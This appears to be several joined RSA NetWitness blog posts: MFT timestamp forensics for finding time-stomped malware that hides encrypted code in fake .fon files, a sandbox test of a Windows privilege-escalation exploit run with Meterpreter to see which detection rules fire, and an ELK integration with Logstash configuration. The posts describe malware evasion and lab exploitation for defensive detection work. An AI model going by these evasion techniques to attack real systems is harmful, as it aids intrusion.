  • Creation Time $FN (you should also sort the files by this column)
  • Creation Time $SI (this is for comparison purposes to $FN)
  • Modification Time $SI (you want the $SI modification time because the $FN timestamps are only good for creation times, not subsequent modifications to the content of the file)
  • Full Path
  • MFT Update Time $SI
  • MFT Update Time $FN (sometimes the $FN timestamp may be backdated, so this timestamp can be used instead)


You can expose additional columns if you wish, but these should be in this order to maximize the effectiveness of your analysis. In order to select/deselect which columns you wish to see, you can right-click on the column:


Column Chooser


Let us now go over an example of why you need the MFT. We start the analysis by reviewing the IIOCs, which, as we mentioned, should be done daily. We notice that a suspicious file is identified under the "Autorun unsigned Winsock LSP" IIOC as shown below:


Winsock LSP IIOC

We see two files with the same name, uixzeue.dll, listed here, which means that even though they share a name, they have different hash values. Let us pull the MFT for this system and see what else occurred that we would not see in Behavioral Tracking, for reasons explained below. When we open the MFT, we select All Files in the left pane and make sure we sort by the $FN Creation Time column. A system can have over 100,000 files, so to quickly get to the one we are interested in, we can search (CTRL-F) for the file name as shown below:


Step 1: Find file of interest

As we can see in the example above, whatever the attacker used to drop these DLLs on this endpoint time stomped the $SI timestamps by backdating them. If we were to sort and perform our analysis on the $SI Creation Time, we would be far away from any events relevant to this malware. The $FN Creation Time shows the true time the file was created (born) on this endpoint. After identifying the file of interest, we can clear the search field to again view all files, and NWE will keep the focus on these two files. When you perform analysis on the MFT, the idea is to look at any files created and/or modified around the time of interest. What we notice is that a few microseconds before the DLLs showed up, two .fon files were created.


FON files

NWE will not have recorded anything related to these .FON files because they are just binary files. In fact, they are the bulk of the malicious code, but their content is encrypted. The job of the DLL, after it is loaded, is to open the .FON file, decrypt it, and load its code into memory. The malicious code and the C2 information are all encrypted inside these .FON files. By the way, these are not font files in any way; they are just stored in the \fonts folder with a .fon extension to blend in with the other files in that folder.
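The "look at everything created around the time of interest" step lends itself to automation once you have the parsed MFT rows exported. A sketch, again using hypothetical record dicts keyed by their $FN creation time:

```python
from datetime import timedelta

def files_near(records, pivot_time, window=timedelta(seconds=2)):
    """Return records whose $FN creation time falls within +/- window of
    pivot_time, sorted chronologically.

    pivot_time would be the $FN creation time of the file that brought you
    to this endpoint (e.g. the suspicious DLL).
    """
    hits = [r for r in records if abs(r["fn_created"] - pivot_time) <= window]
    return sorted(hits, key=lambda r: r["fn_created"])
```

In the example above, running this with the DLL's $FN creation time as the pivot would have surfaced the two .fon files dropped microseconds earlier.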


So, as you can see, every time you are chasing down a malicious file, you should also look at the endpoint's MFT to ensure that you have discovered all artifacts associated with the malicious event.


Happy Hunting!

A question was posed to our team by one of the engineers: had we seen the new Chrome and Microsoft zero-day exploits using RSA NetWitness Endpoint? I honestly didn't even know about these exploits, so I had to do some research. I found the initial Google blog post here: Google Online Security Blog: Disclosing vulnerabilities to protect users across platforms. The first vulnerability (NVD - CVE-2019-5786) is the Google Chrome vulnerability; the second was disclosed to Microsoft by Google, but as of the time of writing, no patch had been released by Microsoft.


Other articles and blogs that discuss these zero-days say they are being used in conjunction with each other. From my research, there was no proof-of-concept code or exploit I could use. I did see some articles mentioning that these were being exploited in the wild, but I couldn't find any further details. The second zero-day is a Windows 7 32-bit privilege escalation vulnerability that performs a null pointer dereference in win32k.sys. I found a similar privilege escalation exploit for CVE-2014-4113 and successfully exploited a box in my sandbox environment while it had a NetWitness Endpoint agent on it. The two IIOCs that fired and would help detect this attack were:


IIOC 1 - “Creates process and creates remote thread on same file”
IIOC 2 - “Unsigned creates remote thread”


The remote thread in this case was created in notepad.exe, which is common with Meterpreter.


The exploit I used can be found here: It also does a null pointer dereference in win32k.sys similar to the Microsoft zero-day.  Below are some screenshots of what I saw from the attacker side and the NetWitness Endpoint side.


Here you can see the exploit being injected into process ID 444.



Here is the entry in RSA NetWitness Endpoint.



Another entry is lsass.exe opening notepad.exe after the remote thread creation.  I believe this is the actual privilege escalation taking place.  It also makes sense because the timestamp matches exactly to the timestamp in Kali.



Here are the IIOCs, which I believe fired on the initial Meterpreter session based on the timestamps. It's still an indication of suspicious activity, and when combined with lsass.exe opening the same remote-thread process, it raises even more alarms.



I gave this to the engineer in the hope that the new Microsoft zero-day could be detected in the same way; even though we don't know the details of the Google Chrome vulnerability, we do know they are being exploited together. This could possibly help identify this attack as it has been seen in the wild. On another note, the fact that two zero-days are being exploited together in the wild just screams of a well-funded, advanced adversary, and it's a relief to know that our tool, out of the box, should be able to help find this type of activity.

In line with some of my other integrations, I recently decided to also create a proof-of-concept solution on how to integrate RSA NetWitness meta data into an ELK stack.


Given that I already had a couple of Python scripts to extract NetWitness meta via the REST API, I quickly converted one of them to generate output in an ELK-friendly format (JSON).
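The script itself isn't reproduced in this post, but the general shape of such a converter is easy to sketch. Note that the /sdk?msg=query URL format and parameter names below are assumptions based on the NetWitness REST API, not the exact script used here:

```python
import json
import urllib.parse

def build_query_url(base, where, size=1000):
    """Build a NetWitness REST query URL (assumed /sdk?msg=query format)."""
    params = {
        "msg": "query",
        "query": "select * where " + where,
        "size": size,
        "force-content-type": "application/json",
    }
    return base.rstrip("/") + "/sdk?" + urllib.parse.urlencode(params)

def to_json_lines(sessions):
    """Emit one JSON object per session, the format Logstash's
    json_lines codec expects on stdin."""
    return "\n".join(json.dumps(s, sort_keys=True) for s in sessions)
```

From there, the real script only needs to fetch the URL, reshape each session's meta key/value pairs into a dict, and print the result of to_json_lines() to stdout for Logstash to consume.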


Setting up an ELK instance is outside the scope of this post; with that done, all I needed was a couple of configuration files and settings.


Step #1 - Define my index mapping template with the help of curl and the attached mappings.json file.

curl -XPUT http://localhost:9200/_template/netwitness_template -d @mappings.json

NOTE: The mappings file may require further customization for additional meta keys you may have in your environment.


Step #2 - Define my Logstash configuration settings.

# Sample Logstash configuration 
# Netwitness -> Logstash -> Elasticsearch pipeline.

input {
  exec {
    command => "/usr/bin/python2.7 /usr/share/logstash/modules/ -c https://sa:50103 -k '*' -w 'service exists' -f /var/tmp/nw.track "
    interval => 5
    type => 'netwitness'
    codec => 'json_lines'
  }
}

filter {
  mutate {
    remove_field => ["command"]
  }
}

output {
  elasticsearch {
    hosts => ["http://localhost:9200"]
    index => "netwitness-%{+YYYY.MM.dd}"
  }
}
Again, a level of ELK knowledge is required that is outside the scope of this post. However, a few settings in the command section may require additional clarification; the Python code documents them, but for ease of reference I'm listing them below:


  1. -c https://sa:50103: the REST endpoint from which to collect the data
  2. -k '*': the list of meta keys to retrieve ('*' retrieves all available meta keys)
  3. -w 'service exists': the SDK query that selects the sessions to retrieve (here, all "packet sessions" meta data)
  4. -f /var/tmp/nw.track: a tracker file location so that each execution of the input command only retrieves new data (i.e., continues from the last data previously retrieved)
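The tracker-file mechanic can be sketched as follows; the assumption (mine, not a detail confirmed in the post) is that the file simply stores the last session id retrieved, so each run resumes where the previous one stopped:

```python
import os

def read_tracker(path):
    """Return the last session id retrieved, or 0 on the first run."""
    if not os.path.exists(path):
        return 0
    with open(path) as f:
        return int(f.read().strip() or 0)

def write_tracker(path, last_session_id):
    """Persist the high-water mark for the next execution."""
    with open(path, "w") as f:
        f.write(str(last_session_id))
```

The collection script would then query only sessions with an id greater than read_tracker(), and call write_tracker() with the highest id it saw before exiting.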


There will be additional configuration settings and steps required in ELK; once again, since ELK is open source, there is plenty of information available on this already, so I won't go into it here. I'm by no means an ELK expert.


Finally, all that is left to show you is how the data looks. First, some of my Dynamic DNS events.


List of NetWitness Events in ELK


Below are the details of one of those events.

 DynDNS Event Details



As a proof of concept, all these details and scripts are provided as-is, without any implied support or warranty. I'm not that experienced with ELK, so I'm sure someone can improve on this significantly; if you do, feel free to share your experiences in the comments section below.


Thank you,


